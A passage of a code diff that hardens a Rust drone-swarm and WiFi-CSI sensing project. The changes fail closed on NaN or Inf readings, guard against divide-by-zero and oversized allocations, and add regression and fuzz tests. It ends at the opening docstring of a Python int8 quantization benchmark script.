"non-finite neighbour distance must fail closed to EmergencyDiverge"
);
}
/// Security: a NaN battery reading must fail closed to ReturnToHome rather
/// than being treated as a healthy battery. Fails on old code where
/// `NaN <= battery_rth_pct` is `false` and the drone stays Nominal.
#[test]
fn test_nan_battery_fails_closed_to_rth() {
let mut fsm = FailSafeMachine::new();
let mut s = good_state();
s.battery_pct = f32::NAN;
let result = fsm.tick(&s, true, 10.0);
assert_eq!(
result,
FailSafeState::ReturnToHome,
"non-finite battery must fail closed to ReturnToHome"
);
}
}
@@ -59,8 +59,16 @@ impl FhssRadio {
}
/// Returns the current active channel frequency in MHz.
///
/// `FhssConfig` is `Deserialize`, so `channels_mhz` can arrive empty from a
/// malformed or hostile config. An empty channel list would make `% n`
/// (n = 0) panic with a divide-by-zero. Guard it and return a benign `0.0`
/// sentinel instead of crashing the radio task (DoS-resistance).
pub fn current_channel_mhz(&self) -> f64 {
let n = self.config.channels_mhz.len();
if n == 0 {
return 0.0;
}
// XOR node seed into hop index so each node uses a different offset
let idx = (self.hop_index ^ (self.node_seed as usize)) % n;
self.config.channels_mhz[idx]
@@ -68,7 +76,11 @@ impl FhssRadio {
/// Advance the hop sequence by one step (call at hop_rate_hz).
pub fn next_hop(&mut self) {
self.hop_index = (self.hop_index + 1) % self.config.channels_mhz.len();
let n = self.config.channels_mhz.len();
if n == 0 {
return; // no channels configured — nothing to hop (avoid `% 0` panic)
}
self.hop_index = (self.hop_index + 1) % n;
}
/// Update with latest RSSI measurement. Drives jamming detection.
@@ -97,9 +109,13 @@ impl FhssRadio {
.wrapping_mul(lcg_a)
.wrapping_add(self.evasion_count)
.wrapping_add(lcg_c);
let n = self.config.channels_mhz.len() as u64;
let len = self.config.channels_mhz.len();
if len == 0 {
return; // no channels configured — avoid `% 0` panic
}
let n = len as u64;
let offset = (seed % n / 4 + 3) as usize;
self.hop_index = (self.hop_index + offset) % self.config.channels_mhz.len();
self.hop_index = (self.hop_index + offset) % len;
self.evasion_count += 1;
self.rssi_history.clear();
}
@@ -165,6 +181,23 @@ mod tests {
assert_eq!(radio.hop_index, (initial_idx + 2) % 50);
}
/// Security/DoS: an empty `channels_mhz` (deserialized from a malformed or
/// hostile config) must not panic with a `% 0` divide-by-zero. Fails on old
/// code, where `next_hop`/`current_channel_mhz`/`evasive_hop`/`tick` all do
/// modulo / index by `channels_mhz.len()`.
#[test]
fn test_empty_channels_does_not_panic() {
let cfg = FhssConfig { channels_mhz: vec![], jamming_detect_window: 1, ..Default::default() };
let mut radio = FhssRadio::new(7, cfg);
// None of these may panic.
let _ = radio.current_channel_mhz();
radio.next_hop();
radio.observe_rssi(-99.0); // window=1 → jamming_detected() true → evasive_hop()
radio.tick(100.0);
radio.evasive_hop();
assert_eq!(radio.current_channel_mhz(), 0.0, "empty channel list returns sentinel");
}
#[test]
fn test_channel_in_valid_range() {
let cfg = FhssConfig::default();
@@ -27,6 +27,16 @@ pub enum GeofenceResult {
impl Geofence {
/// Check a position against this geofence.
pub fn check(&self, pos: &Position3D) -> GeofenceResult {
// Fail CLOSED on a non-finite position. A NaN/Inf component (from a
// corrupt GPS/EKF estimate or a forged position) makes every subsequent
// comparison false: `NaN < min || NaN > max` is `false`, so the altitude
// breach is skipped, and a NaN altitude with otherwise-valid x/y would
// return `Safe` — a silent geofence bypass on a flight-safety boundary.
// Treat any non-finite coordinate as a hard breach.
if !pos.x.is_finite() || !pos.y.is_finite() || !pos.z.is_finite() {
return GeofenceResult::HardBreach;
}
let altitude_m = -pos.z; // NED: negative z = altitude above ground
// Altitude check
@@ -146,4 +156,29 @@ mod tests {
let pos = Position3D { x: 50.0, y: 50.0, z: -200.0 }; // 200m altitude
assert_eq!(f.check(&pos), GeofenceResult::HardBreach);
}
/// Security: a NaN altitude with an otherwise in-bounds x/y must fail closed
/// to HardBreach. Fails on old code where `NaN < min || NaN > max` is `false`,
/// the altitude check is skipped, and the point-in-polygon path returns Safe —
/// a silent geofence bypass.
#[test]
fn test_nan_altitude_fails_closed() {
let f = square_fence();
let pos = Position3D { x: 50.0, y: 50.0, z: f64::NAN };
assert_eq!(f.check(&pos), GeofenceResult::HardBreach);
}
/// Security: NaN/Inf horizontal coordinates must also fail closed.
#[test]
fn test_nonfinite_horizontal_fails_closed() {
let f = square_fence();
assert_eq!(
f.check(&Position3D { x: f64::NAN, y: 50.0, z: -30.0 }),
GeofenceResult::HardBreach
);
assert_eq!(
f.check(&Position3D { x: 50.0, y: f64::INFINITY, z: -30.0 }),
GeofenceResult::HardBreach
);
}
}
@@ -64,10 +64,25 @@ impl MultiViewFusion {
detections: &[CsiDetection],
drone_positions: &[(NodeId, Position3D)],
) -> Option<FusedDetection> {
// Filter by confidence and require estimated position
// Filter by confidence and require a FINITE estimated position.
//
// A peer detection (received via `receive_peer_detection`) carries f32/f64
// fields that can deserialize to NaN/Inf. A NaN `victim_position` passes
// `is_some()` and would propagate through the confidence-weighted average
// into the fused position — dispatching a NaN "confirmed victim" location
// to the swarm. A NaN `confidence` is already rejected by `>= min_confidence`
// (NaN comparisons are false), but we make that explicit and also require
// the victim position components to be finite. Fail CLOSED: drop poisoned
// detections rather than fusing them.
let valid: Vec<(&CsiDetection, &Position3D)> = detections
.iter()
.filter(|d| d.confidence >= self.min_confidence && d.victim_position.is_some())
.filter(|d| {
d.confidence.is_finite()
&& d.confidence >= self.min_confidence
&& d.victim_position
.map(|p| p.x.is_finite() && p.y.is_finite() && p.z.is_finite())
.unwrap_or(false)
})
.filter_map(|d| {
let drone_pos = drone_positions
.iter()
@@ -177,4 +192,46 @@ mod tests {
result.uncertainty_m
);
}
/// Security: a detection with a NaN victim position (poisoned peer report)
/// must be dropped, not fused. Fails on old code where the NaN propagates
/// into the confidence-weighted average and the fused position is NaN.
#[test]
fn test_nan_victim_position_dropped_from_fusion() {
let fusion = MultiViewFusion { min_viewpoints: 2, min_confidence: 0.5 };
let detections = vec![
CsiDetection {
drone_id: NodeId(0),
confidence: 0.9,
victim_position: Some(Position3D { x: 50.0, y: 50.0, z: 0.0 }),
timestamp_ms: 0,
},
CsiDetection {
drone_id: NodeId(1),
confidence: 0.9,
victim_position: Some(Position3D { x: f64::NAN, y: 50.0, z: 0.0 }),
timestamp_ms: 0,
},
CsiDetection {
drone_id: NodeId(2),
confidence: 0.9,
victim_position: Some(Position3D { x: 50.0, y: 50.0, z: 0.0 }),
timestamp_ms: 0,
},
];
let positions = vec![
(NodeId(0), Position3D { x: 0.0, y: 0.0, z: -30.0 }),
(NodeId(1), Position3D { x: 100.0, y: 0.0, z: -30.0 }),
(NodeId(2), Position3D { x: 50.0, y: 86.6, z: -30.0 }),
];
// Two finite viewpoints remain → still fuses, but the result must be finite.
let result = fusion.fuse(&detections, &positions).unwrap();
assert!(
result.estimated_position.x.is_finite()
&& result.estimated_position.y.is_finite()
&& result.estimated_position.z.is_finite(),
"fused position must be finite when a NaN detection is present"
);
assert!(!result.contributing_drones.contains(&NodeId(1)), "NaN detection must be excluded");
}
}
@@ -43,6 +43,20 @@ pub struct Features {
pub const EMBED_MIN_SCORE: f32 = 0.25;
impl Features {
/// The all-zero feature vector — the well-defined result of an empty (or
/// wholly non-finite) capture. Total by construction: downstream
/// specialists read it as "no signal" rather than panicking or poisoning a
/// threshold (see [`Features::from_series`]).
pub const ZERO: Features = Features {
mean: 0.0,
variance: 0.0,
motion: 0.0,
breathing_score: 0.0,
breathing_hz: 0.0,
heart_score: 0.0,
heart_hz: 0.0,
};
/// A fixed-length numeric embedding for nearest-prototype classifiers.
///
/// The hz components are zeroed unless their periodicity score clears
@@ -77,29 +91,33 @@ impl Features {
}
/// Extract features from a per-frame scalar series sampled at `fs` Hz.
///
/// **Total / fail-closed:** non-finite samples (`NaN`/`±inf`) are dropped
/// before any statistic is computed, so a single garbage CSI frame cannot
/// poison `mean`/`variance` into `NaN` and silently disable a persisted
/// specialist (a `NaN` threshold makes every `>` comparison false). A
/// series with no finite samples yields [`Features::ZERO`], exactly like
/// the empty series. Same defensive contract as
/// [`GeometryEmbedding`](crate::geometry_embedding::GeometryEmbedding):
/// adversarial input degrades to "no signal", never to `NaN`.
pub fn from_series(series: &[f32], fs: f32) -> Features {
let n = series.len();
// Drop non-finite samples: a corrupt frame counts as no frame, not as
// a NaN that propagates through every downstream statistic.
let clean: Vec<f32> = series.iter().copied().filter(|v| v.is_finite()).collect();
let n = clean.len();
if n == 0 {
return Features {
mean: 0.0,
variance: 0.0,
motion: 0.0,
breathing_score: 0.0,
breathing_hz: 0.0,
heart_score: 0.0,
heart_hz: 0.0,
};
return Features::ZERO;
}
let mean = series.iter().copied().sum::<f32>() / n as f32;
let variance = series.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
let mean = clean.iter().copied().sum::<f32>() / n as f32;
let variance = clean.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
let motion = if n > 1 {
series.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
clean.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
} else {
0.0
};
// De-mean before periodicity search.
let centered: Vec<f32> = series.iter().map(|v| v - mean).collect();
let centered: Vec<f32> = clean.iter().map(|v| v - mean).collect();
let (breathing_hz, breathing_score) = autocorr_dominant(&centered, fs, 0.1, 0.6);
let (heart_hz, heart_score) = autocorr_dominant(&centered, fs, 0.8, 3.0);
@@ -254,6 +272,36 @@ mod tests {
assert_eq!(f.breathing_hz, 0.0);
}
/// Fail-closed regression: a NaN/inf in the scalar series (corrupt CSI
/// frame) must NOT poison the features into `NaN`/`inf`. Pre-fix, a single
/// `NaN` made `mean`/`variance` `NaN`, which — baked into a persisted
/// `PresenceSpecialist::threshold` — silently disabled presence detection
/// (every `f.variance > NaN` is false). Non-finite samples are dropped.
#[test]
fn non_finite_samples_do_not_poison_features() {
let f = Features::from_series(&[1.0, 2.0, f32::NAN, 4.0, f32::INFINITY, 6.0], 15.0);
assert!(f.mean.is_finite(), "mean must stay finite, got {}", f.mean);
assert!(f.variance.is_finite(), "variance must stay finite, got {}", f.variance);
assert!(f.motion.is_finite(), "motion must stay finite, got {}", f.motion);
for x in f.embedding() {
assert!(x.is_finite(), "embedding slot non-finite: {x}");
}
// Mean is over the 4 finite samples {1,2,4,6} only.
assert!((f.mean - 3.25).abs() < 1e-5, "mean over finite samples, got {}", f.mean);
// Equivalence: dropping the non-finite samples must equal feeding only
// the finite ones — proves the filter, not just finiteness.
let only_finite = Features::from_series(&[1.0, 2.0, 4.0, 6.0], 15.0);
assert_eq!(f, only_finite);
}
/// A series with no finite samples degrades to the all-zero `ZERO`, exactly
/// like the empty series — never `NaN`.
#[test]
fn all_non_finite_series_is_zero() {
let f = Features::from_series(&[f32::NAN, f32::INFINITY, f32::NEG_INFINITY], 15.0);
assert_eq!(f, Features::ZERO);
}
/// ADR-152 "heart-band leakage" regression: a strong breathing rhythm must
/// NOT register as a heart-band periodicity — its in-band autocorr maximum
/// sits at the band edge (monotonic leak), not an interior peak.
@@ -15,6 +15,28 @@ use serde::{Deserialize, Serialize};
use crate::anchor::{AnchorLabel, Posture};
use crate::extract::{AnchorFeature, Features};
/// Default minimum breathing-band periodicity score to report a rate, used when
/// a [`BreathingSpecialist`] carries no explicit `min_score` (the serde / pre-
/// trained-default case). Respiration is a strong, narrowband modulation, so a
/// moderate floor rejects noise windows without dropping real breaths.
pub const DEFAULT_BREATHING_MIN_SCORE: f32 = 0.25;
/// Default minimum HR-band periodicity score, used when a [`HeartbeatSpecialist`]
/// carries no explicit `min_score`. Higher than breathing's: sub-mm chest
/// displacement at HR frequencies sits near the CSI noise floor (ADR-151 §3.2),
/// so the heartbeat head demands a cleaner peak before reporting.
pub const DEFAULT_HEARTBEAT_MIN_SCORE: f32 = 0.3;
/// Multiple of the typical inter-anchor spread ([`AnomalySpecialist::scale`])
/// beyond which a live window is fully out-of-distribution (anomaly score 1.0):
/// a window more than this many spreads from every enrolled prototype is novel.
pub const ANOMALY_OUTLIER_SPREADS: f32 = 2.0;
/// Anomaly score above which the window is *labelled* "anomalous" (vs "normal").
/// Distinct from the runtime veto threshold ([`crate::runtime`]); this only
/// drives the human-readable label.
pub const ANOMALY_LABEL_CUTOFF: f32 = 0.5;
/// Which biological signal a specialist estimates.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub enum SpecialistKind {
@@ -229,7 +251,7 @@ impl Specialist for BreathingSpecialist {
let min = if self.min_score > 0.0 {
self.min_score
} else {
0.25
DEFAULT_BREATHING_MIN_SCORE
};
if f.breathing_score < min || f.breathing_hz <= 0.0 {
return None;
@@ -258,7 +280,7 @@ impl Specialist for HeartbeatSpecialist {
let min = if self.min_score > 0.0 {
self.min_score
} else {
0.3
DEFAULT_HEARTBEAT_MIN_SCORE
};
if f.heart_score < min || f.heart_hz <= 0.0 {
return None;
@@ -383,13 +405,13 @@ impl Specialist for AnomalySpecialist {
.sqrt();
best = best.min(d);
}
// >2× the typical spread → anomalous.
let score = (best / (2.0 * self.scale)).clamp(0.0, 1.0);
// Beyond ANOMALY_OUTLIER_SPREADS× the typical spread → fully anomalous.
let score = (best / (ANOMALY_OUTLIER_SPREADS * self.scale)).clamp(0.0, 1.0);
Some(SpecialistReading {
kind: SpecialistKind::Anomaly,
value: score,
confidence: 0.6,
label: Some(if score > 0.5 { "anomalous" } else { "normal" }.into()),
label: Some(if score > ANOMALY_LABEL_CUTOFF { "anomalous" } else { "normal" }.into()),
})
}
}
@@ -505,6 +527,32 @@ mod tests {
assert!(b.infer(&feat(5.0, 0.2, 0.3, 0.1)).is_none()); // low score → none
}
/// De-magic pin: the named default min-scores must equal the historical
/// literal values, and the gate boundary must be `score >= min` (a window
/// exactly at the default floor reports; a hair below does not).
#[test]
fn default_min_score_constants_match_prior_literals() {
assert_eq!(DEFAULT_BREATHING_MIN_SCORE, 0.25);
assert_eq!(DEFAULT_HEARTBEAT_MIN_SCORE, 0.3);
let b = BreathingSpecialist::default(); // min_score = 0.0 → uses default
assert!(
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE)).is_some(),
"score exactly at the default floor must report"
);
assert!(
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE - 1e-3)).is_none(),
"score below the default floor must not report"
);
}
/// De-magic pin for the anomaly score scale + label cutoff (value-identical
/// to the prior `2.0 * scale` / `> 0.5` literals).
#[test]
fn anomaly_constants_match_prior_literals() {
assert_eq!(ANOMALY_OUTLIER_SPREADS, 2.0);
assert_eq!(ANOMALY_LABEL_CUTOFF, 0.5);
}
#[test]
fn restlessness_normalizes() {
let anchors = vec![
@@ -471,6 +471,54 @@ mod tests {
assert!(ht.record(&f).is_err());
}
/// Security pin (review 2026-06, ADR-127): the UDP parser is the CLI's
/// widest attack surface — `calibrate` / `enroll` / `room-watch` bind it to
/// 0.0.0.0 by default, so any host on the LAN can send arbitrary bytes. A
/// header that *claims* a huge `n_antennas * n_subcarriers` must be rejected
/// by the length check BEFORE the `Array2::zeros` allocation, so a single
/// small datagram can never trigger a multi-MB allocation (unbounded-memory
/// DoS). The largest possible claim (255 × 65535 pairs ≈ 33 MB of IQ) inside
/// a RECV_BUF-sized (2048-byte) datagram parses to `None`, never OOMs.
#[test]
fn test_parse_csi_packet_oversized_claim_is_rejected_not_allocated() {
let mut buf = vec![0u8; RECV_BUF];
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
buf[4] = 1; // node_id
buf[5] = 255; // n_antennas (max)
buf[6..8].copy_from_slice(&65535u16.to_le_bytes()); // n_subcarriers (max)
buf[8..12].copy_from_slice(&2432u32.to_le_bytes());
// n_pairs = 255 * 65535 = 16_711_425 → needs ~33 MB of IQ bytes that a
// 2048-byte datagram cannot carry → length check fails → None.
assert!(parse_csi_packet(&buf, "ht20").is_none());
}
/// Security pin (review 2026-06): the parser must never panic on ANY byte
/// string — truncated headers, lying length fields, odd sizes. IQ-loop
/// indexing is guarded by the length check; this sweeps a spread of
/// adversarial inputs to lock in panic-on-adversarial-input = 0.
#[test]
fn test_parse_csi_packet_never_panics_on_arbitrary_bytes() {
let mut st = 0x1234_5678u64;
let mut next = move || {
st = st
.wrapping_mul(6_364_136_223_846_793_005)
.wrapping_add(1_442_695_040_888_963_407);
(st >> 33) as u8
};
for len in 0..600usize {
let buf: Vec<u8> = (0..len).map(|_| next()).collect();
for tier in ["ht20", "he20", "garbage"] {
let _ = parse_csi_packet(&buf, tier);
}
}
// Valid magic, lying n_subcarriers, no payload → None (not a panic).
let mut buf = vec![0u8; 20];
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
buf[5] = 3;
buf[6..8].copy_from_slice(&500u16.to_le_bytes());
assert!(parse_csi_packet(&buf, "ht20").is_none());
}
#[test]
fn test_freq_to_channel_24ghz() {
assert_eq!(freq_mhz_to_channel(2437), 6);
@@ -1636,6 +1636,67 @@ mod tests {
}
}
/// Security pin (review 2026-06, ADR-127) — `from_canonical_bytes` is a
/// deserialisation boundary for replayed/forwarded captures. A forged header
/// advertising an enormous `rows × cols` must be rejected by the
/// shape-vs-length check (`expect` uses saturating multiplies) BEFORE the
/// `Vec::with_capacity(rows * cols)` allocation — otherwise an attacker could
/// drive a multi-GB allocation from a few header bytes (unbounded-memory
/// DoS). The check guarantees `rows*cols*16 <= bytes.len()`, so the capacity
/// is bounded by the input the caller already holds. This must not OOM.
#[test]
fn canonical_decode_oversized_shape_is_bounded_not_allocated() {
use ndarray::Array2;
let meta = CsiMetadata::new(DeviceId::new("n"), FrequencyBand::Band2_4GHz, 1);
let data = Array2::from_shape_fn((1, 2), |(_, c)| Complex64::new(c as f64, 0.0));
let mut bytes = CsiFrame::new(meta, data).to_canonical_bytes();
// The (rows, cols) u32 pair is the last 8 bytes before the payload.
// Overwrite with a maximal claim (u32::MAX × u32::MAX) and lop off the
// payload so the buffer is tiny but the header lies enormously.
let shape_off = bytes.len() - 8 - 2 * 16; // 2 samples × 16 bytes payload
bytes[shape_off..shape_off + 4].copy_from_slice(&u32::MAX.to_le_bytes());
bytes[shape_off + 4..shape_off + 8].copy_from_slice(&u32::MAX.to_le_bytes());
bytes.truncate(shape_off + 8); // drop the real payload
// expect = MAX*MAX*16 (saturated) > found → PayloadMismatch, no alloc.
assert!(matches!(
CsiFrame::from_canonical_bytes(&bytes),
Err(CanonicalDecodeError::PayloadMismatch { .. })
));
}
/// Security pin (review 2026-06) — the decoder must never panic on arbitrary
/// bytes: every malformed input is a typed `CanonicalDecodeError`, never an
/// unwinding panic (panic-on-adversarial-input = 0). Sweep truncations and a
/// deterministic fuzz spread.
#[test]
fn canonical_decode_never_panics_on_arbitrary_bytes() {
use ndarray::Array2;
let mut meta = CsiMetadata::new(DeviceId::new("node"), FrequencyBand::Band5GHz, 36);
meta.antenna_config.spacing_mm = Some(50.0);
let data = Array2::from_shape_fn((2, 8), |(r, c)| Complex64::new(r as f64, c as f64));
let good = CsiFrame::new(meta, data).to_canonical_bytes();
// Every prefix of a valid encoding must decode without panicking.
for n in 0..good.len() {
let _ = CsiFrame::from_canonical_bytes(&good[..n]);
}
// Deterministic LCG fuzz over varied lengths.
let mut st = 0xDEAD_BEEFu64;
for len in 0..400usize {
let buf: Vec<u8> = (0..len)
.map(|_| {
st = st
.wrapping_mul(6_364_136_223_846_793_005)
.wrapping_add(1_442_695_040_888_963_407);
(st >> 33) as u8
})
.collect();
let _ = CsiFrame::from_canonical_bytes(&buf);
}
}
/// AC8c (review finding 7) — `Some(Uuid::nil())` calibration is an
/// encoding error: nil is the wire sentinel for `None`, so encoding it
/// would alias two distinct frames to one byte string (and one witness).
+75 -1
View File
@@ -15,7 +15,11 @@ pub fn haversine(a: &GeoPoint, b: &GeoPoint) -> f64 {
let lat1 = a.lat.to_radians();
let lat2 = b.lat.to_radians();
let h = (dlat / 2.0).sin().powi(2) + lat1.cos() * lat2.cos() * (dlon / 2.0).sin().powi(2);
2.0 * WGS84_A * h.sqrt().asin()
// `asin` is only defined on [-1, 1]. For (near-)antipodal points floating
// rounding can push `h.sqrt()` to 1.0 + epsilon, and `asin(>1)` is NaN —
// which would silently poison any distance-based comparison downstream.
// Clamp into domain so the result is always a finite distance.
2.0 * WGS84_A * h.sqrt().clamp(0.0, 1.0).asin()
}
/// WGS84 to local ENU (East-North-Up) relative to origin, in meters.
@@ -83,3 +87,73 @@ pub fn tiles_for_bbox(bbox: &GeoBBox, zoom: u8) -> Vec<TileCoord> {
}
tiles
}
#[cfg(test)]
mod tests {
use super::*;
// ── haversine asin-domain robustness ───────────────────────────────────
//
// For (near-)antipodal points, floating rounding can push the haversine
// term `h` to 1.0 + ~4e-16, and `asin(sqrt(h)) = asin(>1)` is NaN. A NaN
// distance silently breaks every downstream comparison (all `<`/`>` become
// false), so the result must stay finite. This exact pair produced
// h = 1.0000000000000004 pre-fix (verified empirically).
#[test]
fn haversine_near_antipodal_is_finite_not_nan() {
let a = GeoPoint {
lat: -44.4994,
lon: -178.957_22,
alt: 0.0,
};
let b = GeoPoint {
lat: 44.499_399_99,
lon: 1.042_780_01,
alt: 0.0,
};
let d = haversine(&a, &b);
assert!(d.is_finite(), "near-antipodal haversine must be finite, got {d}");
// Half-circumference is ~20_037 km; result must be close to that.
assert!(
(19_000_000.0..21_000_000.0).contains(&d),
"antipodal distance should be ~half-circumference, got {d}"
);
}
#[test]
fn haversine_identical_points_is_zero() {
let p = GeoPoint {
lat: 43.65,
lon: -79.38,
alt: 0.0,
};
let d = haversine(&p, &p);
assert!(d.is_finite() && d < 1e-6, "identical points → 0, got {d}");
}
// ── pole-singularity robustness (degenerate geometry) ──────────────────
//
// The ENU transforms divide by cos(lat); at the poles cos(±90°) = 0, so
// the longitude term is non-finite. We do not change the transform (that
// would alter near-pole results), but we pin that the call does NOT panic.
#[test]
fn wgs84_to_enu_at_pole_does_not_panic() {
let origin = GeoPoint {
lat: 90.0,
lon: 0.0,
alt: 0.0,
};
let point = GeoPoint {
lat: 89.99,
lon: 10.0,
alt: 0.0,
};
// Must return without panicking. North/up stay finite; east may be
// non-finite at the exact pole — assert the bounded components only.
let enu = wgs84_to_enu(&point, &origin);
assert!(enu[1].is_finite(), "north component must be finite");
assert!(enu[2].is_finite(), "up component must be finite");
}
}
@@ -68,6 +68,21 @@ pub fn parse_hgt(data: &[u8], origin_lat: f64, origin_lon: f64) -> Result<Elevat
let n_samples = data.len() / 2;
let side = (n_samples as f64).sqrt() as usize;
// A valid SRTM grid is at least 2x2 — anything smaller has no cell spacing.
// Without this guard, `side - 1` underflows (panic in debug, wraps to a
// huge value in release) and `1.0 / (side - 1)` yields a garbage/inf
// `cell_size_deg` that then poisons every `ElevationGrid::get` lookup. A
// truncated download, a 404 HTML body, or an empty response can all reach
// here, so fail loudly instead of corrupting the persisted grid.
if side < 2 {
anyhow::bail!(
"HGT data too small: {} bytes ({} samples, side {}) — need at least a 2x2 grid",
data.len(),
n_samples,
side
);
}
let heights: Vec<f32> = data
.chunks_exact(2)
.map(|c| {
@@ -129,3 +144,42 @@ pub fn extract_subgrid(grid: &ElevationGrid, center: &GeoPoint, radius_m: f64) -
heights,
}
}
#[cfg(test)]
mod tests {
use super::*;
// ── parse_hgt degenerate-input robustness ──────────────────────────────
//
// Before the `side < 2` guard, an empty or sub-2x2 buffer made
// `1.0 / (side - 1)` underflow `side` (panic in debug / huge wrap in
// release) and produce a garbage `cell_size_deg`. A truncated download or
// a 404 HTML page reaches `parse_hgt`, so these must Err, not panic/poison.
#[test]
fn parse_hgt_empty_data_errors_not_panics() {
let res = parse_hgt(&[], 40.0, -75.0);
assert!(res.is_err(), "empty HGT must Err, got {res:?}");
}
#[test]
fn parse_hgt_single_sample_errors() {
// 2 bytes = 1 sample → side 1 → div-by-zero cell_size (inf) pre-fix.
let res = parse_hgt(&[0u8, 0u8], 40.0, -75.0);
assert!(res.is_err(), "1-sample HGT must Err, got {res:?}");
}
#[test]
fn parse_hgt_minimal_2x2_is_finite() {
// 4 samples = 8 bytes → side 2 → cell_size = 1.0 (finite, valid).
let data = vec![0u8; 8];
let grid = parse_hgt(&data, 40.0, -75.0).expect("2x2 HGT should parse");
assert_eq!(grid.cols, 2);
assert_eq!(grid.rows, 2);
assert!(
grid.cell_size_deg.is_finite() && grid.cell_size_deg > 0.0,
"cell_size must be finite positive, got {}",
grid.cell_size_deg
);
}
}
@@ -220,6 +220,9 @@ fn create_test_sensors(count: usize) -> Vec<SensorPosition> {
z: 1.5,
sensor_type: SensorType::Transceiver,
is_operational: true,
// No live RSSI plumbed for synthetic bench sensors (simulated
// zone) — localization must not fabricate one.
last_rssi: None,
}
})
.collect()
@@ -700,4 +700,79 @@ mod tests {
assert!(conf > 0.7, "self-similarity should exceed match threshold");
}
}
// ── NaN-state-poisoning guard (the proven recurring bug class) ──────────
//
// The calibration/vitals crates were both bitten by a single non-finite
// sample latching into persistent state and freezing all outputs forever.
// Here the auto-accumulating persistent state is `occupancy` (an EMA:
// `*occ = *occ*0.7 + new*0.3`) and `vitals` (motion/breathing/heart).
//
// The UDP parser can only ever emit finite amplitudes/phases (sqrt and
// atan2 of i8 values), so the realistic ingress is already safe. This test
// is stronger: it injects an adversarial hand-built `CsiFrame` carrying
// NaN/inf amplitudes and phases (possible because the fields are public),
// and pins that the persistent state self-heals to finite values rather
// than latching NaN and silently freezing — i.e. the bug class is absent.
#[test]
fn nonfinite_frame_does_not_poison_persistent_state() {
let mut s = CsiPipelineState::default();
// Warm up with valid frames so vitals/occupancy are populated.
seed_state_with_frames(&mut s, 60);
// A valid baseline must be finite to start.
assert!(s.occupancy.iter().all(|d| d.is_finite()));
assert!(s.vitals.breathing_rate.is_finite());
assert!(s.vitals.motion_score.is_finite());
// Inject a stream of poisoned frames: NaN/inf amplitudes + phases on a
// valid header (node_id 1, finite rssi). Mimics a corrupt sensor.
for i in 0..40 {
let nan_frame = CsiFrame {
node_id: 1,
n_antennas: 1,
n_subcarriers: 32,
channel: 6,
rssi: -50,
noise_floor: -90,
timestamp_us: 10_000 + i,
iq_data: vec![0i8; 64],
amplitudes: vec![f32::NAN; 32],
phases: vec![f32::INFINITY; 32],
};
s.process_frame(nan_frame);
}
// Persistent auto-accumulating state must remain finite — a single
// poisoned frame (or 40) must not permanently corrupt outputs.
assert!(
s.occupancy.iter().all(|d| d.is_finite()),
"occupancy EMA must not latch NaN/inf"
);
assert!(
s.vitals.breathing_rate.is_finite(),
"breathing_rate must stay finite, got {}",
s.vitals.breathing_rate
);
assert!(
s.vitals.heart_rate.is_finite(),
"heart_rate must stay finite, got {}",
s.vitals.heart_rate
);
assert!(
s.vitals.motion_score.is_finite(),
"motion_score must stay finite, got {}",
s.vitals.motion_score
);
// And the pipeline must recover: feeding valid frames again yields a
// finite, in-range breathing estimate (not a frozen NaN).
seed_state_with_frames(&mut s, 60);
assert!(s.vitals.breathing_rate.is_finite());
assert!(
(0.0..=40.0).contains(&s.vitals.breathing_rate),
"breathing must be in clamp range after recovery, got {}",
s.vitals.breathing_rate
);
}
}
@@ -184,4 +184,43 @@ mod tests {
let fused = fuse_clouds(&[&a], 0.5);
assert_eq!(fused.points.len(), 1, "three close points → one voxel");
}
// ── degenerate-input robustness (no panic, sensible output) ────────────
//
// These pin that the voxel accumulators handle empty / single / all-
// coincident inputs without dividing by zero or panicking. The per-voxel
// count is always >= 1 (the entry is created on first insert), so the
// `/n` averaging is safe — but make that contract explicit so a future
// refactor cannot silently reintroduce a div-by-zero.
#[test]
fn fuse_clouds_empty_input_is_empty() {
let fused = fuse_clouds(&[], 0.1);
assert!(fused.points.is_empty(), "no clouds → no points");
let empty = PointCloud::new("empty");
let fused2 = fuse_clouds(&[&empty], 0.1);
assert!(fused2.points.is_empty(), "empty cloud → no points");
}
#[test]
fn fuse_clouds_single_point_is_finite() {
let a = cloud_with("a", &[(1.0, 2.0, 3.0)]);
let fused = fuse_clouds(&[&a], 0.1);
assert_eq!(fused.points.len(), 1);
let p = &fused.points[0];
assert!(
p.x.is_finite() && p.y.is_finite() && p.z.is_finite() && p.intensity.is_finite(),
"single-point voxel must average to a finite point"
);
}
#[test]
fn fuse_clouds_all_coincident_collapses_finite() {
// Many identical points → one voxel, finite averaged centroid.
let a = cloud_with("a", &[(0.5, 0.5, 0.5); 100]);
let fused = fuse_clouds(&[&a], 0.25);
assert_eq!(fused.points.len(), 1, "coincident points → one voxel");
let p = &fused.points[0];
assert!((p.x - 0.5).abs() < 1e-4 && p.x.is_finite());
}
}
@@ -0,0 +1,294 @@
#!/usr/bin/env python3
"""ADR-175: int8 quantization of the WiFlow-STD "half" pose model + MEASURED accuracy/size trade-off.
Sub-deliverable 8.2 of the benchmark/optimization milestone. Quantizes the 843,834-param
"half" WiFlow-STD pose model to int8 (QAT primary, static-PTQ fallback) and MEASURES the
accuracy delta against the fp32 baseline under ONE locked PCK normalization.
LOCKED NORMALIZATION (ADR-173): torso-diameter PCK neck(idx 2)->pelvis(idx 12) distance,
exactly the default `use_torso_norm=True` path of upstream `utils/metrics.calculate_pck`,
which is the standard MM-Fi/GraphPose-Fi convention. The SAME `calculate_pck` /
`calculate_mpjpe` from the upstream harness scores BOTH fp32 and int8 so the comparison is
metric-locked. The test split is the seed-42 file-level 70/15/15 test partition (54,000
windows full / 52,560 NaN-free) produced by the SAME loader that produced half_best.pth.
int8 backend: FX graph-mode quantization, fbgemm engine (server x86 int8). Quantized int8
kernels execute on CPU, so int8 eval is CPU; an fp32-CPU baseline is also measured so the
accuracy delta is device-matched (CPU fp32 vs CPU int8), and an fp32-GPU number is reported
for continuity with the sweep's recorded numbers.
